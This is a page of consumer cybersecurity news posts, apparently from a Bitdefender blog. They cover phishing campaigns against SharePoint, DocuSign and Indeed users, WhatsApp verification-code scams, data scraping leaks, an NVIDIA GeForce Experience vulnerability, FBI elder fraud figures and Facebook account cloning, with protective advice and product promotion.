Phishing Alert: Scammers Use Fake SharePoint and DocuSign Messages to Steal Users’ Login Credentials

According to Bitdefender Antispam Lab researchers, cyber thieves are actively targeting DocuSign and Sharepoint users in phishing attacks designed to mimic legitimate correspondence from the two web-based platforms.

Microsoft credentials up for grabs with fake Sharepoint emails

The phishing attack spotted on June 24 appears to have originated from the United States. 33% of the fake emails reached users in the US, 26% in Ireland, 14% in Korea, 12% in Sweden, 5% in Denmark, and 1% in Finland, UK and India.

The scam email, disguised as an automated Microsoft SharePoint, does not seek to infect recipients with malware. The scammers are looking to steal login credentials from their targets—most of the emails use COVID-19 as a ruse to dupe recipients into accessing a bogus document.

For example, the email below asks to review a “Covid 19 relief fund as approved by the board of directors.”

The emails are not directed to any specific employee within the targeted organization. Users who try to access the document will be directed to a landing page mimicking an Outlook login page.

Those who fall for the bait are giving the attackers their legitimate Microsoft credentials, allowing them to commit further crimes, including spreading spear-phishing emails, impersonating employees and stealing sensitive data.

DocuSign brand continues to be exploited during COVID

The DocuSign phishing campaign intercepted by our researchers closely resembles a legitimate email that a user might receive from the company. The perps sent out thousands of emails, most of them originating from IP addresses in Germany and Russia. A rather large number of hits targeted Portuguese and United States users. The message use the brands’ logo, content and footer to dupe recipients into believing the email is real.

The recipient is asked to click a link to review and sign a document. The link directs the user to a bogus webpage that mimics DocuSign, and the user is prompted to sign in to their Adobe account to view the document.

If you’re one of the unfortunate users who clicked on the link and provided your credentials, change the password immediately and take proactive measures. You should also report the fraudulent email and website via the dedicated channel and spread the word to friends, family and co-workers.

Signing documents online from anywhere in the world does save time and effort, especially during the pandemic and social-distancing efforts. However, it’s essential for users to remain vigilant and double-check the correspondence before downloading an attachment or providing login credentials, giving cybercriminals the upper hand and freedom to access sensitive information.

Note: This article is based on technical information provided courtesy of Bitdefender Antispam Lab

Google to Require Developers to Enable 2FA and Provide Real Information Before Uploading Apps in Play Store

Google is preparing a series of measures meant to better secure the Google Play Store by ensuring the developers who upload apps and updates are more trustworthy.

The Google Play Store is a vast library of software, and it’s growing by the minute. While the company is doing its best to keep malware and other types of threats on its platforms, it’s not entirely successful. More than once, Google has been forced to pull apps from the store after discovering developers uploaded apps that didn’t respect the license agreement but weren’t malicious enough to trigger the existing protection.

“To keep Google Play safe and secure and to better serve our developer community, we are introducing two new security measures: additional identification requirements and 2-Step Verification,” said Google. “These measures will help strengthen your account security and will help us better understand your needs.”

Creating a new developer account on the platform is now a little more complex, with a few extra steps that would discourage, hopefully, developers with malicious intent. Now, developers have to provide an email address and a phone number. 

Moreover, owners of developer accounts will have to tell Google whether it’s a personal or enterprise account, and disclose the name of the holder and a physical address. Also, the existing emails and phone numbers on file will have to be verified.

Having real people, with real names, behind accounts will help keep the official store a little safer. Google will occasionally email or call the developers to check if the information provided is real. While all of these measures are positive, they won’t offer 100% protection against attacks. Running a security app such as Bitdefender Mobile Security at all times is always recommended.

US Government Accountability Office Recommends NASA Harden Protection Against Cyberattacks

The Government Accountability Office (GAO) sent a letter to NASA in an effort to make the space agency more resilient to cyberattacks by proposing several security measures that would ensure its protection.

NASA is one of the many agencies in the US government considered vulnerable to cyberattacks, making it a prime candidate for essential improvements. Like any big organization, NASA has organizational issues that often translate to security problems. In some respects, NASA faces the same challenges as a private conglomerate, with issues stemming from the huge number of employees.

The proposed measures cover many areas, but it’s worth mentioning that NASA already implemented some of the proposals coming from GAO. In any case, NASA is not the only agency going through these changes.

“We have designated information security as a government-wide, high-risk area since 1997 and subsequently expanded this high-risk area to include protecting cyber critical infrastructure and securing personally identifiable information,” says GAO.

“Accordingly, federal agencies need to take urgent actions to ensure that they have programs in place to protect their information technology systems and sensitive information against increasing cyber risks.”

NASA already agreed to implement GAO’s recommendations, including an organization-wide cybersecurity risk assessment, a typical process that every large organization has to complete. Another request covers NASA Acquisition Management, which incidentally is on GAO’s High-Risk List of government operations with more significant vulnerabilities.

Finally, GAO is urging NASA to cover the rest of the high-risk targets that include improving the management of IT acquisitions and operations, improving strategic human capital management, managing federal real property, and ensuring the nation’s cybersecurity and government-wide personnel security. Some of these measures are already being implemented and should be ready by the end of the year.

Received a WhatsApp verification code without requesting it? Beware – you might be about to have your account stolen

Police in the UK are warning WhatsApp users of a surge they have seen in attempts made by fraudsters to steal accounts.

In a tweet posted by Southwark Police in South London, for instance, officers warn that scammers are stealing accounts by tricking WhatsApp users to share verification codes they are sent via SMS.

The scam works like this. Whenever someone tries to register a WhatsApp account on a mobile phone they give WhatsApp a phone number. WhatsApp sends an SMS verification code to the mobile phone number they have been given, to verify that the number is active and that the user trying to register the account really owns the number.

However, a fraudster might contact a WhatsApp user – perhaps pretending to be WhatsApp customer support – and ask them to forward the six-digit verification code that has just been- or is about to be – received on the mobile phone.

Of course, you haven’t requested a verification code. Instead, a scammer has entered your phone number and requested a registration code – in an attempt to hijack your account.

On its website, WhatsApp warns that keeping your verification code secret is an essential part of securing your account:

You should never share your WhatsApp verification code with others. If someone is trying to take over your account, they need the SMS verification code sent to your phone number to do so. Without this code, any user attempting to verify your number can’t complete the verification process and use your phone number on WhatsApp. This means you remain in control of your WhatsApp account.

Of course, if someone does manage to seize control of your WhatsApp account they will then be able to see any future messages you receive, and pretend to be you.

WhatsApp says that for this reason you should never share your verification code with anyone, even if they are friends or family.

“If you suspect someone else is using your WhatsApp account, you should notify family and friends as this individual could impersonate you in chats and groups. Please note, WhatsApp is end-to-end encrypted and messages are stored on your device, so someone accessing your account on another device can’t read your past conversations.”

For a higher level of security on WhatsApp, you are advised to not only never share your six-digital registration code, but also enable two-step verification, restrict who can view your profile photo, and be cautious about transferring money with contacts unless you have confirmed their identity.

WhatsApp offers further advice on how to recover your account if it has been stolen from you, and recommends that you log out of all computers from your phone if you still believe someone might be using your account via WhatsApp Web/Desktop.

Your Doxxing Dossier Will Keep Growing Thicker Until You See the Danger

On June 22, the profile details of 700 million LinkedIn users were put up for sale on an underground forum.

The same thing happened on April 6 for 500 million LinkedIn users. The exposed data contained profile information such as e-mail addresses, job descriptions, social media profile links and phone numbers.

On April 3, the phone numbers and associated profile info of over 530 million Facebook users were leaked online. The leaks included geographical location and even phone numbers, including Mark Zuckerberg’s.

What Happened

In all three cases, threat actors used the same method — web scraping. Automated tools harvested all the information from user profiles, abusing various APIs made available by the platforms. They attempted to pull much more than would typically be available without special privileges, such as the privileges given to a user connected to the victim.

It’s important to note that the services were not “hacked”, at least not in the way we’ve grown to understand the word. No database was stolen, and no platform internals were exposed. In fact, users’ passwords are still safe. But any information that could be shared was shared in the process – including data that users believed only close friends could see, like e-mail addresses or phone numbers.

Here’s what YOU need to know

The incidents highlight two points to understand and remember.

First and foremost, the moment you hand out a business card or post information on an online profile, the information becomes public. It’s been repeatedly proven that privacy settings don’t always work. This problem is amplified by the massive size of our “private circle” of connections or friends on these platforms.

Check how many people you have in that “private circle.” Phone numbers, e-mail addresses, Social Security numbers, and home addresses are data points we’re constantly forced to share with an increasing number of people and organizations. It’s only a matter of time before they’re exposed publicly.

Now more than ever, it’s crucial to KNOW when that happens. And, here, the Bitdefender Digital Identity Protection tool can help. Our service lets you take control and minimize your digital footprint by continuously monitoring for data breaches, publicly exposed information and social media impersonators.

Secondly, be mindful of your ever-growing (and never-shrinking) online dossier/file, and take some time to brush up on doxxing. Every piece of relevant information about you can (and probably already is) added to a file with your name on it.

This information can later be used in:

  • identity theft (buying things, getting credit or simply causing damage to you and your loved ones by doing illegal things in your name)
  • selling your data to advertising networks, less legitimate than the ones you’re already willingly providing it to
  • stalking/domestic violence. It may be an uncomfortable scenario, but it DOES HAPPEN

Just check your digital footprint and learn if an ill-intended actor can do carry out the acts in any of the three bullet points above or, God forbid, all of them. While LinkedIn and Facebook could have done a better job at preventing scraping bots, system vulnerabilities are exposed daily. Even though the platforms are sometimes quick to patch loopholes found by hackers, as users and members of the digital community, it’s also our job to be aware of the information we willingly expose and how it can be used against us.

NVIDIA Patches High-severity Vulnerability that Allowed for Spoofing Attacks via GeForce Experience

NVIDIA patched a GeForce Experience high-severity vulnerability that would have allowed attackers to perform spoofing attacks, leading to the compromise of the user’s login token.

NVIDIA offers an application named GeForce Experience to their GPU users, letting them easily install the latest drivers, change game settings to better fit the PC’s performance, record video, stream and more. The application also requires users to log in for various perks.

It turns out that the application also had a high-severity vulnerability, which the company was quick to fix. Since a remote non-authenticated attacker can exploit the vulnerability via the Internet, it’s a big problem. But the fact that it still required some input from the user, like clicking on a link, kept the severity score to only 8.3.

“NVIDIA GeForce Experience software contains a vulnerability where, if a user clicks on a maliciously formatted link that opens the GeForce Experience login page in a new browser tab instead of the GeForce Experience application and enters their login information, the malicious site can get access to the token of the user login session,” said the company. “Such an attack may lead to these targeted users’ data being accessed, altered, or lost.”

The company explained that the vulnerability was only possible because the application incorrectly parsed specially formatted links.

“A remote attacker can create a specially crafted link that opens the GeForce Experience login page in a new browser tab instead of the GeForce Experience application and enters their login information, the malicious site can get access to the token of the user login session” they added.

Installing the latest version of the application fixes this exploit. It should not be a problem since the update is directly pushed to users who have the app installed, and it’s installed when the app is opened.

GitHub Says 2020 Saw the Most Vulnerability Submissions in Bug Bounty Program

GitHub revealed that its Security Bug Bounty Program registered the most submissions in 2020 since its launch in 2014, and 204 vulnerabilities qualified for bounties.

Companies figured out a while ago that it’s better to find the vulnerabilities in their own software than to leave it to hackers or to hope that it’ll work out fine. All software and hardware has vulnerabilities. Sometimes, the good guys find them, but the entire industry can suffer when that’s not the case. In these programs, such as the one GitHub runs, security researchers are encouraged to find and report vulnerabilities in exchange for a bounty.

“2020 was our busiest year yet,” said GitHub. “From February 2020 to February 2021, we handled a higher volume of submissions than any previous year.[…] $524,250 in bounties awarded for 203 vulnerabilities in our products and services. This brings the overall rewards from our program since moving to HackerOne in 2016 to $1,552,004,” GitHub explained.

The company also provided a very interesting example of a bug submission that affected its own platform,, and which could have been used to compromise the OAuth flow of Gist users.

“While the risk is fairly low, this vulnerability could be used to facilitate social engineering attacks by providing a link to that would end up redirecting to an attacker-directed site,” said GitHub.

It’s no surprise that 2020 was such a busy year for submission of vulnerabilities, as many people suddenly switched to working from home. Security researchers paid more attention to some of the more popular apps, and the entire bounty industry is becoming a lot more profitable.

Cyber Crooks Hunt for Indeed Job Seekers’ Account Credentials in Latest Phishing Campaign

The Bitdefender Antispam Lab has detected an ongoing phishing campaign targeting users of employment website Indeed.

According to our researchers, 48% of the fraudulent emails have reached users in the US, 28% in Ireland, 5% in Finland, 3% in France and India and 2% in Germany.

The cyber crooks use spoofing to trick users into thinking the message was sent from the employment platform, forging the email header to display ’’.

The email asks recipients to confirm their email address by downloading “the attached account update file” and logging into their account.

Accessing the HTML attachment named “Indeed_Update.html” will open a fraudulent login page with the recipients’ email address already filled in.

Indeed users who receive this email should not open the attachment or enter their password into the login page. Instead, delete the email and head to the official company website from your browser. Recipients who unwittingly entered their account password should immediately reset their password on and other online platforms that share the same login credentials.

As a reminder, employment-oriented services will not contact you via email and ask for personally identifiable information or financial information such as bank account numbers.

A vast number of online platforms deploy email verification processes. However, according to Indeed, users who sign up on the platform will receive a confirmation email during the setup process. The message asks recipients to confirm their email address by clicking on a link.

If you’re tired of wondering whether the correspondence in your Inbox is genuine, check out our 90-day Bitdefender Total Security trial that offers complete real-time data protection and anti-phishing filtering systems that sniff out and block websites masquerading as trustworthy entities.

Note: This article is based on technical information provided courtesy of Bitdefender Antispam Lab

One billion dollars lost by over-60s through online fraud in 2020, says FBI

According to a newly-published report by the FBI’s Internet Crime Complaint Center (IC3), the elderly are more at risk from falling victim to online fraud and internet scammers than ever before.

In the IC3’s Elder Fraud Report, the FBI detailed that approximately 28% of all fraud losses are sustained by victims who are over 60 years old – with losses totalling approaching US $1 billion.

Worryingly, that figure represents a rise of around $300 million compared to losses reported by seniors in 2019.

According to the FBI, while the average loss per victim was US $9,175, some 1,921 victims aged sixty and above lost more than US $100,000 to online scammers.

Figures released in the report show that not only were the over-60s most likely to become victims of all the age brackets surveyed, but also their total losses were the greatest.

Older adults, the study found, were often defrauded as a result of romance scams, tech support fraud, and investment scams. In addition, data suggests that hundreds of millions of dollars have been lost by companies through business email compromise attacks, facilitated unwittingly by staff aged over 60 years old.

It would be unfair and incorrect to characterise these attacks as succeeding simply because it was a more elderly person has been unlucky enough to fall victim. After all, a romance scam or email account compromise attack doesn’t discriminate between its targets based upon their age.

However, it’s possible that a victim’s age may play a factor in making them vulnerable to some scams – such as romance scams – especially if they have suffered a bereavement.

Furthermore, many of us with elderly loved ones may have found out the hard way that they can be naturally more trusting, compared to those of us who have spent a greater proportion of our lives guarding against internet scammers.

It’s also worth considering the impact that the global pandemic has had.

As the IC3 report explains, many elderly people may have found themselves shopping online for the first time due to Coronavirus lockdown restrictions.

“Elderly victims filed over 14,000 non-payment/non-delivery complaints experiencing losses over $40 million in 2020, making non-delivery of products the second most reported fraud among the elderly.”

In addition, many over-60s may have found themselves joining social networking sites for the first time in an attempt to stay in contact with friends and loved ones that they were not able to meet in person. As a result, they may have been easy pickings for online scammers posting fake adverts or promoting counterfeit products.

In some cases, attacks have taken a particularly dark and sinister nature with victims receiving threatening emails informing them (falsely) that they have been infected with COVID-19, or threatening to infect them with the virus, unless a cryptocurrency payment was made.

The onus lies on all of us to not assume that older members of our families, elderly friends and neighbours, are as clued up as we might be about online threats. We need to do our part to offer sensible advice and guidance to others to ensure that they do not become a soft target for online fraudsters.

Facebook Clone Wars: How to Check For Social Media Impersonators Who Use Your Info to Scam Friends and Family

Have you ever received a friend request from a person already on your list of friends on Facebook? If so, you were most likely targeted by a cloned Facebook account.

If not, chances are you will. You’ll likely run into a scam artist posing as either you or one of your friends while you’re busy checking your social media feed.

It may be impossible to predict the exact number of fake and impostor accounts on Facebook. However, the social media guru said it took action against 1.3 billion fake accounts in the first quarter of 2021.

What is Facebook account cloning?

Facebook cloning happens when scammers scrape your publicly available social media information (such as your profile picture and info) to create a copy of your profile. The imposter then tries to send friend requests to your list of friends to conduct various scams, including:

  • Sending malicious and fraudulent links to your friends and family
  • Manipulating your friends or family members for financial gain
  • Attempting to defraud your acquaintances using advance fee scams

These attempts may compromise your online and real-life reputation. Additionally, the scammer will even try to shut down your profile by reporting you to the social media platform.

How to protect against Facebook account cloning?

You don’t have to be a celebrity to become a target of social media impostors. While most individuals find out about an impersonation attempt from friends, users can also track down potential scammers by searching their own name in the Facebook search field.

Although no measures are bulletproof, adopting more privacy-focused settings on your Facebook account can discourage scammers from attempting to clone it, including:

  • Making your friends list hidden
  • Removing public visibility on your future posts, photos and profile information such as email address and phone number
  • Disable any options that allow anyone to send you a friend request

Living in a social media-driven age, protecting online privacy and personal information is a must. Bitdefender’s Digital Identity Protection tool helps you take control and minimize your digital footprint by continuously monitoring for data breaches and social media impersonators that may ruin your reputation

Our tool proactively scans the web for accounts set up using your data. Each time a new profile is created using your info, you can easily inspect it and stop impersonation attempts before they cause irreparable harm.

Don’t forget to immediately report any impersonation attempts or suspicious activity to the social media platform and immediately inform your friends.

Posts navigation

1 2 3 4 103 104 105
Scroll to top